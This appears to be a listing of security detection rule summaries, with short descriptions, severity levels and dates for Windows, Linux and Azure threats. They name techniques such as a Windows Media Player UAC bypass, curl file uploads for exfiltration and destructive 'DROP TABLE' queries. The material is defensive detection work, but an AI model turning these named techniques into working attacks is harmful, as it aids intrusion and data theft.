System Information Discovery via Registry Queries:
product: windowscategory:process_creationlevel:lowdate:2025-06-12
Detects attempts to query system information directly from the Windows Registry.
WScript or CScript Dropper - File:
product: windowscategory:file_eventlevel:highdate:2022-01-10
Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe
MSSQL Destructive Query:
product: windowslevel:mediumdate:2025-06-04
Detects the invocation of MS SQL transactions that are destructive towards table or database data, such as "DROP TABLE" or "DROP DATABASE".
Application URI Configuration Changes:
product: azurelevel:highdate:2022-06-02
Detects when a configuration change is made to an applications URI.
URIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.
UAC Bypass Using Windows Media Player - Process:
product: windowscategory:process_creationlevel:highdate:2021-08-23
Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
Suspicious Curl File Upload - Linux:
product: linuxcategory:process_creationlevel:mediumdate:2022-09-15
Detects a suspicious curl process start the adds a file to a web request
Password Protected ZIP File Opened:
product: windowslevel:mediumdate:2022-05-09
Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.
Suspicious Download from Office Domain:
product: windowscategory:process_creationlevel:highdate:2021-12-27
Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents
